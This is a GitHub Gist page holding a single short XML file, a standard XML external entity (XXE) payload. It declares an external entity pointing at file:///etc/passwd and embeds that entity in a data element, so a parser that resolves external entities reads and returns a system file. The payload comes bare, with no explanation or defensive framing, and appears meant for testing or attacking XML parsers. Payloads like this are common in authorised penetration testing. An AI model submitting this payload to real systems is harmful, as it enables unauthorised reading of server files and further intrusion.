Created
April 19, 2025 07:47
-
-
Save zaharevic/3cc272bddf589ce93ee77eaf1983b618 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> | |
]> | |
<data>&xxe;</data> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment